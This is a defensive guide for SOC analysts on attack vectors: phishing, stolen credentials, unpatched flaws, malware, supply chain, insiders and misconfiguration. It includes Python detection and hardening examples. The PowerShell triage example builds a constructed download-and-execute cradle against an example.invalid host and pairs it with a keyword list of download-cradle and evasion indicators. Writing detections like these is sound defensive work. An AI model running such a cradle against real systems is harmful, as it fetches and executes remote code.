
What Is an Attack Vector? Types and Defenses

An attack vector is the method or path an adversary uses to gain unauthorized access to a system, network, or account.

In the 2026 Verizon Data Breach Investigations Report, exploitation of a software vulnerability was the way into 31 percent of breaches, overtaking stolen credentials for the first time in nineteen years of the report. Phishing accounted for 16 percent. Credential abuse, last year's leader, dropped to 13 percent. Three numbers, three different doors into the same building.

Each of those doors is an attack vector. The vector is not the malware, the ransom note, or the stolen database. It is the specific path the attacker used to get the first foothold, the thing that turned an outsider into someone running code or holding a valid session inside your environment. Name the vector and you know where to put the control.

This guide defines the term precisely, separates it from the attack surface it is often confused with, and works through the vectors that actually show up in incident reports: phishing and social engineering, stolen credentials, unpatched vulnerabilities, malware, supply chain compromise, insider misuse, and misconfiguration. For each, it covers how the vector is exploited and how a blue team shuts it down. It is written for SOC analysts, threat hunters, and DFIR responders who have to trace an intrusion back to its entry point.

What is an attack vector?

An attack vector is the method or path an adversary uses to gain unauthorized access to a system, network, or account. It is the entry technique, the specific way the attacker crossed from outside your trust boundary to inside it: a phishing email that harvested a password, an internet-facing server with an unpatched flaw, a contractor's reused credential, a poisoned software update.

Two attacks with completely different goals can share a vector, and one goal can be reached through many vectors. Ransomware is not a vector. It is an objective, the thing the attacker does after they are in. The vector is how they got in to deliver it: a phished credential, an exposed RDP service, a vulnerable VPN appliance. When a post-incident report says "the threat actor gained initial access via," the words that follow are the vector.

That framing matters because defense is organized around vectors, not outcomes. You cannot buy a control that stops "data theft" in the abstract. You can require phishing-resistant multi-factor authentication, patch the internet-facing application, and alert on a service account logging in from a new country. Each of those closes or monitors a specific vector. The list of known vectors is your list of doors to lock.

In MITRE ATT&CK terms, attack vectors map to the Initial Access tactic (TA0001). The techniques under it are the catalog of vectors with IDs you can write detections against: Phishing (T1566), Valid Accounts (T1078), Exploit Public-Facing Application (T1190), External Remote Services (T1133, the exposed RDP or VPN case), Trusted Relationship (T1199, the compromised service provider case), and more. ATT&CK is currently at version 19.1. Reconnaissance and Resource Development precede Initial Access in the matrix, but those happen on the attacker's side; Initial Access is the first tactic that takes place inside your environment, which is where the intrusion you are trying to prevent actually begins.

Attack vector vs. attack surface

These two terms get used interchangeably, and they should not be. The distinction is simple once you see it, and it changes how you talk about exposure.

The attack surface is the sum of all the points where an attacker could try to get in. NIST defines it as the set of points on the boundary of a system where an attacker can try to enter, cause an effect on, or extract data from that system. Every internet-facing service, every user account, every API endpoint, every employee who can be phished, every third-party integration. The surface is the total exposed area.

An attack vector is one specific path across that surface. It is the route actually taken or available, not the whole field of possibilities. If the attack surface is every door and window on the building, a vector is the one unlocked back door the burglar used.

Definition. Attack surface: all points where an attacker could attempt entry. Attack vector: one specific method or path used to gain entry.
Scope. Attack surface: aggregate, the whole exposed area. Attack vector: singular, one route.
Example. Attack surface: 200 internet-facing hosts, 5,000 user accounts, 30 SaaS integrations. Attack vector: a phishing email to one of those accounts.
Defender's job. Attack surface: reduce it (decommission, segment, consolidate). Attack vector: block or monitor it (patch, MFA, filtering).
Measured by. Attack surface: asset and exposure inventory. Attack vector: initial-access analysis per incident.

The practical link between them: every vector is a slice of the surface, so shrinking the surface removes vectors wholesale. Decommission a forgotten internet-facing server and you delete every vector that ran through it at once. This is why attack surface management and vector-level hardening are the same program viewed at two zoom levels. Surface reduction is strategic and cuts categories of risk; vector hardening is tactical and closes the specific paths attackers are using right now.

The common attack vectors

Seven doors into the network. Each vector is one path across the attack surface. Map it to an ATT&CK Initial Access technique, then put a control on it.

Phishing / social engineering (T1566): a lure tricks a user into giving up a credential, clicking a link, or approving an action.
Stolen credentials (T1078): a valid login from breach dumps, credential stuffing, or infostealers. No exploit, just access.
Unpatched vulnerability (T1190): a crafted request to an exposed, flawed service. Now the top vector at 31 percent.
Malware (T1204 / T1059 for the user execution and scripting that follow delivery; note these sit under the Execution tactic, and the Initial Access counterpart for a drive-by download is T1189): malicious code run by a user or dropped via an exploit to set the first foothold.
Supply chain (T1195, or T1199 when the way in is a compromised service provider): a trusted vendor, package, or update is compromised and arrives signed.
Insider (T1078): authorized access abused or mishandled. Starts legitimate.
Misconfiguration (T1190 / T1078, or T1133 for an exposed remote service): an exposed or over-permissioned resource. The dominant cloud vector.

Defender takeaway: attackers use the cheapest door that works. Identity ties most of these together, so close the easy doors first and watch for valid access used wrong.

The vectors below are the ones that dominate real breach data. Most intrusions start with one of them. They are not exotic. The recurring lesson of every annual breach report is that attackers use the cheapest door that works.

Phishing and social engineering

Phishing tricks a person into handing over a credential, running an attachment, or approving an action. It remains one of the top vectors because it targets the user, not the technology, and the user is reachable from anywhere. The 2025 IBM Cost of a Data Breach Report found phishing was the single most common initial vector, behind 16 percent of breaches, and the 2026 Verizon DBIR attributes 62 percent of breaches to a human element somewhere in the chain.

How it is exploited: a spear-phishing email impersonates a vendor or executive and links to a credential-harvesting page, or carries a malicious attachment. Variants include vishing (voice), smishing (SMS), and MFA-fatigue or push-bombing attacks that wear down a user into approving a login. Attackers increasingly use AI to draft fluent, targeted lures at scale.

How it is defended: phishing-resistant MFA (FIDO2 hardware keys, not SMS codes) removes the value of a harvested password. Email security that detects lookalike domains and detonates attachments in a sandbox catches delivery. User reporting, with a one-click report button that feeds the SOC, turns the workforce into a sensor. Detection-side, alert on impossible-travel logins, new-device sign-ins, and MFA push spikes.

Stolen and compromised credentials

A valid credential is the quietest vector there is. The attacker does not exploit anything. They log in. There is no malware to detect and no exploit to block, which is why credential-based intrusions routinely dwell the longest before discovery.

How it is exploited: credentials come from phishing, prior breach dumps replayed in credential stuffing, infostealer malware that scrapes saved passwords and session cookies, brute-force against exposed services, or simple purchase on criminal markets. Once in, the attacker abuses Valid Accounts (T1078) and often looks indistinguishable from the legitimate user.

How it is defended: MFA everywhere, prioritizing phishing-resistant factors on privileged and internet-facing access. Kill standing privilege with just-in-time elevation. Monitor for the behavioral tells a stolen login leaves: a service account interactively logging in, access from a new geography, logins outside normal hours, or a sudden spike in authentication failures preceding a success.
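The behavioral tells listed above for phishing and for stolen credentials are all computable from an ordinary sign-in log. The following is an added example (not code from the original page or any vendor) that runs four of those detections over a handful of constructed sign-in events: impossible travel between two successful logins, a burst of denied MFA pushes (push bombing), a run of failures immediately followed by a success, and a service account logging in interactively. The event field names, the `svc-` naming convention, and the thresholds are assumptions to be tuned to your own identity provider.

```python
"""Detections for the phishing and stolen-credential vectors over constructed sign-in events."""
from collections import defaultdict
from datetime import datetime
from math import asin, cos, radians, sin, sqrt


def _ev(ts, user, result, lat, lon, logon="interactive"):
    return {"ts": ts, "user": user, "result": result, "lat": lat, "lon": lon, "logon": logon}


# Constructed sample events, not real logs. The field names are an assumption,
# loosely modelled on an identity provider's sign-in log, not any vendor's schema.
EVENTS = [
    # alice: success in London, then success in New York 90 minutes later
    _ev("2025-06-01T08:00:00", "alice", "success", 51.51, -0.13),
    _ev("2025-06-01T09:30:00", "alice", "success", 40.71, -74.01),
    # bob: six denied MFA pushes in five minutes, then an approval (push bombing)
    *[_ev(f"2025-06-01T22:0{i}:00", "bob", "mfa_push_denied", 37.77, -122.42) for i in range(6)],
    _ev("2025-06-01T22:06:00", "bob", "success", 37.77, -122.42),
    # carol: six password failures in six minutes, then a success
    *[_ev(f"2025-06-02T03:0{i}:00", "carol", "failure", 48.86, 2.35) for i in range(6)],
    _ev("2025-06-02T03:06:00", "carol", "success", 48.86, 2.35),
    # svc-backup: a service account with an interactive logon
    _ev("2025-06-02T04:00:00", "svc-backup", "success", 48.86, 2.35),
    # dave: ordinary activity, should raise nothing
    _ev("2025-06-02T09:00:00", "dave", "success", 48.86, 2.35),
    _ev("2025-06-02T17:00:00", "dave", "success", 48.86, 2.35),
]


def _t(e):
    return datetime.fromisoformat(e["ts"])


def _by_user(events):
    groups = defaultdict(list)
    for e in sorted(events, key=_t):
        groups[e["user"]].append(e)
    return groups


def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance in kilometres."""
    dlat, dlon = radians(lat2 - lat1), radians(lon2 - lon1)
    a = sin(dlat / 2) ** 2 + cos(radians(lat1)) * cos(radians(lat2)) * sin(dlon / 2) ** 2
    return 2 * 6371.0 * asin(sqrt(a))


def impossible_travel(events, max_kmh=900.0):
    """Consecutive successful logins whose implied speed exceeds an airliner's."""
    hits = []
    for user, evs in _by_user(events).items():
        ok = [e for e in evs if e["result"] == "success"]
        for a, b in zip(ok, ok[1:]):
            hours = (_t(b) - _t(a)).total_seconds() / 3600
            km = haversine_km(a["lat"], a["lon"], b["lat"], b["lon"])
            if hours > 0 and km / hours > max_kmh:
                hits.append((user, round(km), round(hours, 2)))
    return hits


def mfa_push_spike(events, window_min=10, threshold=5):
    """Many denied MFA pushes for one user inside a short window (push bombing)."""
    hits = []
    for user, evs in _by_user(events).items():
        pushes = [_t(e) for e in evs if e["result"] == "mfa_push_denied"]
        for i, start in enumerate(pushes):
            n = sum(1 for t in pushes[i:] if (t - start).total_seconds() <= window_min * 60)
            if n >= threshold:
                hits.append((user, n))
                break
    return hits


def burst_then_success(events, window_min=15, threshold=5):
    """A run of failures followed by a success: brute force or stuffing that worked."""
    hits = []
    for user, evs in _by_user(events).items():
        for i, e in enumerate(evs):
            if e["result"] != "success":
                continue
            recent_fails = sum(
                1 for p in evs[:i]
                if p["result"] == "failure" and (_t(e) - _t(p)).total_seconds() <= window_min * 60)
            if recent_fails >= threshold:
                hits.append((user, recent_fails))
                break
    return hits


def service_account_interactive(events, prefix="svc-"):
    """Service accounts should never log on interactively; a human holding one is a tell."""
    return sorted({e["user"] for e in events
                   if e["user"].startswith(prefix) and e["logon"] == "interactive"})


def run_all(events):
    return {
        "impossible_travel": impossible_travel(events),
        "mfa_push_spike": mfa_push_spike(events),
        "burst_then_success": burst_then_success(events),
        "service_account_interactive": service_account_interactive(events),
    }


if __name__ == "__main__":
    for name, hits in run_all(EVENTS).items():
        print(f"{name}: {hits}")
```

Each detector returns the users it fired on, so the same functions can feed a test harness or a scheduled query. The thresholds are deliberately conservative; in production the impossible-travel check should also tolerate VPN egress points and known corporate ranges, or it will page on every remote worker.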

Unpatched vulnerabilities

Exploiting a public-facing flaw is now the leading initial-access vector in the Verizon data, up from 20 to 31 percent of breaches and roughly a 55 percent year-over-year rise. The pattern is consistent: a critical CVE drops in a widely deployed edge device (a VPN gateway, a file-transfer appliance, a firewall), a proof-of-concept follows within days, and mass exploitation hits the organizations that have not patched.

How it is exploited: the attacker scans the internet for a vulnerable version, sends a crafted request that triggers the flaw, and gets code execution or an authentication bypass with no user interaction required. This maps to Exploit Public-Facing Application (T1190). Edge appliances are the favored target because they sit at the boundary, often lack endpoint agents, and are slow to patch.

How it is defended: a vulnerability management program that prioritizes by real-world exploitation, not just CVSS score, using signals like CISA's Known Exploited Vulnerabilities catalog. Shrink the exposure: take services off the public internet, put them behind a VPN or identity-aware proxy, and inventory what is actually reachable. Where you cannot patch immediately, apply virtual patching at the WAF and watch the asset closely.
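"Prioritize by real-world exploitation, not just CVSS" is easy to say and easy to get backwards in a spreadsheet. The following added example (not code from the page or from CISA) shows the ranking logic in working form: scanner findings are ordered by whether the CVE is in the Known Exploited Vulnerabilities catalog, whether the asset is reachable from the internet, whether the catalog flags ransomware use, and only then by CVSS. The KEV excerpt is constructed in the shape of CISA's JSON feed (the field names follow the real feed; the CVE IDs are placeholders, not real vulnerabilities), and the findings and asset names are made up.

```python
"""Exploitation-aware patch prioritisation over constructed scanner findings."""
import json

# Constructed excerpt in the shape of CISA's KEV JSON feed. Only the field names
# follow the real feed; the CVE IDs below are placeholders, not real vulnerabilities.
KEV_FEED_JSON = json.dumps({
    "title": "constructed KEV excerpt",
    "vulnerabilities": [
        {"cveID": "CVE-0000-0001", "vendorProject": "ExampleVendor", "product": "EdgeGateway",
         "knownRansomwareCampaignUse": "Known", "dueDate": "2025-07-01"},
        {"cveID": "CVE-0000-0004", "vendorProject": "ExampleVendor", "product": "InternalApp",
         "knownRansomwareCampaignUse": "Unknown", "dueDate": "2025-08-01"},
    ],
})

# Constructed scanner output: asset, CVE, CVSS base score, and whether the
# asset is reachable from the internet (from your exposure inventory).
FINDINGS = [
    {"asset": "vpn-edge-01", "cve": "CVE-0000-0001", "cvss": 7.2, "internet_facing": True},
    {"asset": "db-internal-03", "cve": "CVE-0000-0002", "cvss": 9.8, "internet_facing": False},
    {"asset": "web-portal-02", "cve": "CVE-0000-0003", "cvss": 9.1, "internet_facing": True},
    {"asset": "hr-app-01", "cve": "CVE-0000-0004", "cvss": 6.5, "internet_facing": False},
]


def load_kev(feed_json):
    """Index the catalog by CVE ID for O(1) lookup."""
    return {v["cveID"]: v for v in json.loads(feed_json)["vulnerabilities"]}


def tier(finding, kev):
    """P1: actively exploited and exposed. P2: exploited but internal, or exposed and critical.
    P3: everything else, regardless of CVSS."""
    in_kev = finding["cve"] in kev
    if in_kev and finding["internet_facing"]:
        return "P1"
    if in_kev or (finding["internet_facing"] and finding["cvss"] >= 9.0):
        return "P2"
    return "P3"


def prioritize(findings, kev):
    """Order findings by (in KEV, internet-facing, ransomware use, CVSS), highest first."""
    def key(f):
        entry = kev.get(f["cve"])
        ransomware = bool(entry) and entry.get("knownRansomwareCampaignUse") == "Known"
        return (f["cve"] in kev, f["internet_facing"], ransomware, f["cvss"])
    ordered = sorted(findings, key=key, reverse=True)
    return [(f["asset"], f["cve"], tier(f, kev)) for f in ordered]


if __name__ == "__main__":
    for asset, cve, t in prioritize(FINDINGS, load_kev(KEV_FEED_JSON)):
        print(f"{t}  {cve}  {asset}")
```

The point the ordering makes: the CVSS 9.8 flaw on the internal database lands last, behind a CVSS 6.5 flaw that is known to be exploited, because the catalog membership and the exposure inventory carry more signal than the base score. Swap the constructed feed for the real one and the findings for your scanner export and the same function gives you a patch queue.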

Malware

Malware is both a vector and a payload depending on where it sits in the intrusion. As a vector, it is the malicious code that establishes the initial foothold: a trojanized installer, a macro-laden document, a drive-by download from a compromised site.

How it is exploited: the user is induced to run the file, or a vulnerability is used to drop it. Modern variants lean on fileless techniques that live in memory and abuse legitimate tools (PowerShell, WMI, signed binaries) to avoid writing detectable artifacts to disk. Loaders and infostealers are the common first-stage payloads, pulling down the real tooling once they have a foothold.

How it is defended: endpoint detection and response (EDR) that watches behavior, not just file signatures, since the fileless and living-off-the-land variants leave no static signature. Application allowlisting to stop unapproved binaries. Keep Office's default block on macros in files downloaded from the internet in place and enforce it by policy so users cannot click through it. Network monitoring for the command-and-control beaconing that follows a successful install.
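Behavioral detection of the living-off-the-land pattern described above mostly comes down to looking at process lineage and command lines rather than file hashes. The following added example (not code from the page or from any EDR product) decodes a PowerShell `-EncodedCommand` blob from a process-creation event, scores the decoded text for download-cradle and evasion indicators, and weights the result when the parent is an Office application. The events are constructed in a Sysmon Event ID 1-like shape; the field names, the indicator list, and the scoring weights are assumptions, and the cradle is assembled inside the example against a reserved `.invalid` hostname.

```python
"""Decode and triage encoded PowerShell in constructed process-creation events."""
import base64
import re

# -e / -ec / -en / -enc / -EncodedCommand followed by a base64 blob (PowerShell accepts prefixes)
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")
# Substrings that mark download cradles and evasion flags; matched case-insensitively.
# "-w hidden" is the common abbreviation of -WindowStyle Hidden.
SUSPICIOUS = ("downloadstring", "downloadfile", "invoke-webrequest", "net.webclient",
              "invoke-expression", "iex", "frombase64string", "-nop", "-w hidden")
OFFICE_PARENTS = ("winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe")

# Constructed events, not real telemetry. The cradle is built here for the example.
_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage1.ps1')"
_ENC = base64.b64encode(_CRADLE.encode("utf-16le")).decode("ascii")
EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": f"powershell.exe -nop -w hidden -enc {_ENC}"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
]


def decode_encoded_command(cmdline):
    """Return the decoded script if the command line carries an encoded command, else None."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        # PowerShell encodes the script as UTF-16LE before base64
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(event):
    """Score one process-creation event; higher means more worth an analyst's time."""
    cmd = event["CommandLine"]
    parent = event.get("ParentImage", "").lower().rsplit("\\", 1)[-1]
    decoded = decode_encoded_command(cmd)
    # Inspect the visible flags plus the decoded script, with the base64 blob removed
    # so that chance substrings inside it cannot match an indicator.
    visible = cmd if decoded is None else ENCODED_FLAG.sub(" ", cmd) + " " + decoded
    hits = sorted(k for k in SUSPICIOUS if k in visible.lower())
    score = len(hits) + (2 if decoded is not None else 0) + (3 if parent in OFFICE_PARENTS else 0)
    return {"image": event["Image"], "parent": parent, "decoded": decoded,
            "indicators": hits, "score": score}


def suspicious_events(events, min_score=4):
    return [triage(e) for e in events if triage(e)["score"] >= min_score]


if __name__ == "__main__":
    for r in (triage(e) for e in EVENTS):
        print(r["score"], r["parent"], r["indicators"])
        if r["decoded"]:
            print("  decoded:", r["decoded"])
```

The second event, an administrator's signed backup script run from Explorer, scores zero even though it also uses `-ExecutionPolicy Bypass`; the first scores on five indicators plus the encoding and the Office parent. That separation is what a signature on `powershell.exe` alone cannot give you.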

Supply chain compromise

A software supply chain attack reaches a target through software or a service the target already trusts. The attacker compromises a vendor, a build pipeline, an open-source package, or a managed service provider, and the malicious code rides in through a legitimate, signed channel.

How it is exploited: a poisoned dependency pulled from a package registry, a backdoored update to widely deployed software, or a compromised MSP whose remote-management tooling reaches every customer at once. The defining feature is that the malicious artifact arrives trusted, so it bypasses controls that key on provenance.

How it is defended: maintain a software bill of materials (SBOM) so you know what you actually run and can react when a component is flagged. Pin and verify dependencies. Apply least privilege and segmentation to vendor and MSP access so a compromised partner cannot reach your whole estate. Monitor third-party integrations for anomalous behavior the same way you watch internal accounts.
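"Pin and verify dependencies" has a concrete meaning in most package ecosystems: record the exact version and the hash of the artifact, and refuse to install anything that does not match. The following added example (not code from the page or from pip) checks a requirements file written in pip's `--hash` pinning syntax against the artifacts that were actually downloaded and classifies each line as verified, hash mismatch, pinned without a hash, or unpinned. The package names, artifact bytes, and requirements lines are constructed for the example.

```python
"""Verify hash-pinned dependencies before install (constructed artifacts and requirements)."""
import hashlib
import re

# Constructed artifacts standing in for downloaded packages; the bytes are made up.
ARTIFACTS = {
    "pkg-a": b"constructed contents of pkg-a 1.4.2",
    "pkg-b": b"constructed contents of pkg-b 2.0.0",
    "pkg-c": b"constructed contents of pkg-c 0.9.1",
}
_GOOD_A = hashlib.sha256(ARTIFACTS["pkg-a"]).hexdigest()

# Constructed requirements in pip's --hash pinning syntax. pkg-b's recorded hash is
# wrong (what a swapped artifact looks like), pkg-c has a version but no hash, and
# pkg-d is an unpinned range that will float to whatever the registry serves next.
REQUIREMENTS = f"""\
pkg-a==1.4.2 --hash=sha256:{_GOOD_A}
pkg-b==2.0.0 --hash=sha256:{'0' * 64}
pkg-c==0.9.1
pkg-d>=3.0
"""

LINE = re.compile(r"^(?P<name>[A-Za-z0-9_.-]+)\s*(?P<op>==|>=|<=|~=|!=|>|<)?\s*(?P<ver>\S+)?(?P<rest>.*)$")
HASH = re.compile(r"--hash=sha256:([0-9a-f]{64})")


def check_requirements(text, artifacts):
    """Map each requirement name to ok / hash_mismatch / pinned_no_hash / unpinned / missing_artifact."""
    results = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = LINE.match(line)
        name, op = m.group("name"), m.group("op")
        pinned_hashes = HASH.findall(m.group("rest") or "")
        if op != "==":
            results[name] = "unpinned"
        elif not pinned_hashes:
            results[name] = "pinned_no_hash"
        elif name not in artifacts:
            results[name] = "missing_artifact"
        elif hashlib.sha256(artifacts[name]).hexdigest() in pinned_hashes:
            results[name] = "ok"
        else:
            results[name] = "hash_mismatch"
    return results


def safe_to_install(results):
    """Fail closed: one unverifiable dependency blocks the whole install."""
    return all(status == "ok" for status in results.values())


if __name__ == "__main__":
    verdicts = check_requirements(REQUIREMENTS, ARTIFACTS)
    for name, status in verdicts.items():
        print(f"{name:8s} {status}")
    print("install allowed:", safe_to_install(verdicts))
```

Treating "pinned but no hash" as a failure is the deliberate choice here: a version pin stops accidental upgrades, but only a hash ties the install to the exact bytes you reviewed, which is the property a poisoned re-upload of the same version number defeats.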

Insider threats

An insider already has legitimate access, which makes this vector hard to distinguish from normal work. The insider can be malicious (a disgruntled employee, a planted operative) or negligent (someone who mishandles data or falls for a lure). Either way the access starts authorized.

How it is exploited: a departing employee copies a customer database, an administrator abuses privilege to exfiltrate data, or a careless user emails sensitive files to a personal account. Because the access is legitimate, there is no exploit and often no alert unless you are watching the right behavior.

How it is defended: least privilege so each person can reach only what their role needs, which caps the blast radius. Data loss prevention on egress paths. Behavioral analytics that baseline normal activity per user and flag deviations: mass file access, off-hours bulk downloads, use of unsanctioned transfer channels. Tightened monitoring during the high-risk window around terminations.

Misconfiguration

Misconfiguration is the self-inflicted vector. No attacker skill is required because the defender left the door open: a cloud storage bucket set to public, a database exposed to the internet with no authentication, an over-permissioned identity role, a default credential never changed.

How it is exploited: automated scanners crawl the internet continuously for exposed services and open buckets. A misconfigured resource is often found within minutes of going live. There is no exploit chain to detect because the configuration itself grants the access. This is the dominant vector in cloud breaches, where a single permissive policy can expose everything behind it.

How it is defended: cloud security posture management (CSPM) to continuously scan for and flag risky configurations against a baseline. Infrastructure as code with policy-as-code guardrails so misconfigurations are caught before deployment. Block public access at the account level by default. Regular configuration audits and least-privilege identity reviews.
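A policy-as-code guardrail is a small program that reads the configuration before it is applied and refuses the patterns that keep showing up in breach reports. The following added example (not code from the page or from any CSPM product) lints AWS policy documents for the two patterns named above: an Allow statement granting access to any principal with no Condition, and a wildcard Action on a wildcard Resource. It shows the public bucket policy beside its corrected form. The policies are constructed; the account ID 123456789012 is the placeholder AWS uses in its own documentation, and the bucket and role names are made up.

```python
"""Policy-as-code check for public and over-permissioned AWS policies (constructed documents)."""
import json

# Constructed bucket policy: readable by anyone on the internet.
PUBLIC_BUCKET_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [{
        "Sid": "ReadAll", "Effect": "Allow", "Principal": "*",
        "Action": "s3:GetObject", "Resource": "arn:aws:s3:::example-reports/*"}]})

# The corrected form: the same grant, scoped to one role in one account.
FIXED_BUCKET_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [{
        "Sid": "ReadFromAppRole", "Effect": "Allow",
        "Principal": {"AWS": "arn:aws:iam::123456789012:role/reports-reader"},
        "Action": "s3:GetObject", "Resource": "arn:aws:s3:::example-reports/*"}]})

# Constructed identity policy: full administrative rights on everything.
ADMIN_ROLE_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [{"Effect": "Allow", "Action": "*", "Resource": "*"}]})


def _as_list(value):
    """Policy grammar allows a string or a list in most positions; normalise to a list."""
    return value if isinstance(value, list) else [value]


def _principal_is_anyone(principal):
    """True for Principal "*" or {"AWS": "*"}, the two spellings of 'anonymous'."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        return "*" in _as_list(principal.get("AWS", []))
    return False


def lint_policy(policy_json):
    """Return (statement id, finding code, explanation) tuples for risky Allow statements."""
    findings = []
    doc = json.loads(policy_json)
    for i, st in enumerate(_as_list(doc.get("Statement", []))):
        if st.get("Effect") != "Allow":
            continue
        sid = st.get("Sid", f"Statement[{i}]")
        actions = [a.lower() for a in _as_list(st.get("Action", []))]
        resources = _as_list(st.get("Resource", []))
        if "Principal" in st and _principal_is_anyone(st["Principal"]):
            if "Condition" in st:
                findings.append((sid, "CONDITIONAL_PUBLIC",
                                 "Allow to any principal, narrowed only by a Condition; review it"))
            else:
                findings.append((sid, "PUBLIC_PRINCIPAL",
                                 "Allow to any principal with no Condition"))
        if any(a == "*" or a.endswith(":*") for a in actions) and "*" in resources:
            findings.append((sid, "WILDCARD_ADMIN", "wildcard Action on Resource *"))
    return findings


if __name__ == "__main__":
    for label, doc in (("public bucket", PUBLIC_BUCKET_POLICY),
                       ("fixed bucket", FIXED_BUCKET_POLICY),
                       ("admin role", ADMIN_ROLE_POLICY)):
        print(label, lint_policy(doc) or "clean")
```

Run this in the pipeline that applies the policy and fail the deploy on `PUBLIC_PRINCIPAL` or `WILDCARD_ADMIN`. It complements, rather than replaces, the account-level default the paragraph above describes: S3 Block Public Access at the account level catches a public bucket policy even when the linter is skipped.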

Top attack vectors at a glance

Phishing / social engineering
  How it is exploited: a lure tricks a user into a credential, click, or approval
  Primary defenses: phishing-resistant MFA, email security, user reporting
  ATT&CK technique: T1566

Stolen credentials
  How it is exploited: a valid login from dumps, stuffing, or infostealers
  Primary defenses: MFA, just-in-time privilege, login anomaly detection
  ATT&CK technique: T1078

Unpatched vulnerability
  How it is exploited: a crafted request to an exposed, flawed service
  Primary defenses: risk-based patching, surface reduction, virtual patching
  ATT&CK technique: T1190

Malware
  How it is exploited: malicious code run by a user or dropped via an exploit
  Primary defenses: EDR, allowlisting, macro hardening
  ATT&CK technique: T1204, T1059 (Execution-tactic techniques; T1189 for drive-by delivery)

Supply chain
  How it is exploited: a trusted vendor, package, or update is compromised
  Primary defenses: SBOM, dependency pinning, vendor least privilege
  ATT&CK technique: T1195 (T1199 for a compromised service provider)

Insider
  How it is exploited: authorized access abused or mishandled
  Primary defenses: least privilege, DLP, behavioral analytics
  ATT&CK technique: T1078

Misconfiguration
  How it is exploited: an exposed or over-permissioned resource
  Primary defenses: CSPM, policy-as-code, default-deny exposure
  ATT&CK technique: T1190, T1078 (T1133 for an exposed remote service)

Two patterns cut across the table. First, identity is the connective tissue: stolen credentials, insider misuse, and many misconfigurations all resolve to "an attacker held a valid identity they should not have," which is why identity monitoring catches more than any single signature. Second, the cheapest vectors win. Attackers prefer logging in over breaking in, and prefer an unpatched edge device over a custom exploit. Defense follows the same economics: close the easy doors first.

How blue teams use the attack vector model

Thinking in vectors is not academic. It is how a SOC turns a pile of alerts and an asset inventory into a defensible priority list.

Initial-access analysis in incident response. The first question in any investigation is "how did they get in?" Pinning the vector scopes the whole response. A phished credential means hunting for everything that session touched and forcing a password and token reset. An exploited edge appliance means assuming the box is fully compromised and checking what else it could reach. The vector dictates containment.

Detection coverage mapping. Plot your detections against the common vectors and the gaps show up as empty rows. A team with strong endpoint coverage but no detection for anomalous logins is blind to the credential vector, which is exactly where quiet intrusions live. Mapping to ATT&CK Initial Access techniques makes the audit concrete.

Threat-informed prioritization. Cyber threat intelligence tells you which vectors the groups targeting your sector actually use. If the relevant actors favor exploitation of a specific appliance class you run, that vector jumps the patch queue ahead of a higher-CVSS flaw on something not exposed. Vectors let you spend finite effort where the real risk is.

Attack surface reduction. Vector analysis feeds back into shrinking the surface. Every incident that traces to a forgotten internet-facing service is a prompt to inventory and decommission the rest before they become the next vector. The cheapest vector to defend is the one you removed.

The fastest way to internalize this is to work real intrusions and label the entry point on each. Tracing an attack back to its vector, then deciding which control would have closed it, is the same loop a SOC analyst runs every day. Practicing on realistic attacks builds the instinct to spot the door before the attacker does.

The bottom line

An attack vector is the path an adversary takes to gain initial access, and it is the unit defense is actually organized around. Name the vector and you know which control closes it. The attack surface is the aggregate of every possible vector; shrinking it deletes vectors wholesale, while hardening individual vectors closes the routes attackers are using now.

The breach data is consistent year to year: attackers use the cheapest door that works, which today means exploiting unpatched edge services and logging in with valid credentials more than deploying novel malware. The defender's job is to inventory the doors, lock the easy ones first, and watch the ones that have to stay open. The way to make that instinctive is to work real intrusions and trace each one back to where it started.

Frequently asked questions

What is an attack vector in simple terms?

An attack vector is the specific path or method an attacker uses to break into a system, network, or account. Examples are a phishing email, a stolen password, or an unpatched internet-facing server. It describes how the attacker got in, not what they did once inside.

What is the difference between an attack vector and an attack surface?

The attack surface is the total set of all points where an attacker could try to get in, the whole exposed area. An attack vector is one specific path across that surface that an attacker actually uses. Reducing the attack surface removes vectors in bulk; hardening a vector closes one specific route.

What are the most common attack vectors?

The most common are phishing and social engineering, stolen or compromised credentials, exploitation of unpatched vulnerabilities, malware, supply chain compromise, insider misuse, and misconfiguration. In the 2026 Verizon DBIR, vulnerability exploitation (31 percent) overtook stolen credentials as the leading initial-access vector, with phishing at 16 percent.

Is malware an attack vector?

Malware can be the vector when malicious code establishes the initial foothold, such as a trojanized installer or a macro-laden document. But malware is often the payload delivered after the attacker is already in through another vector like phishing or an exploited vulnerability. The vector is the path in; the payload is what runs after.

What is the most common attack vector in cloud environments?

Misconfiguration dominates cloud breaches: public storage buckets, databases exposed without authentication, and over-permissioned identity roles. Automated scanners find these within minutes of exposure, and no exploit is needed because the configuration itself grants access. Cloud security posture management and default-deny policies are the primary defenses.

How do attack vectors map to MITRE ATT&CK?

Attack vectors correspond to the Initial Access tactic (TA0001) in MITRE ATT&CK. Each vector has a technique with an ID you can detect against: Phishing is T1566, Valid Accounts (stolen credentials and insider access) is T1078, and Exploit Public-Facing Application is T1190. ATT&CK is currently at version 19.1.
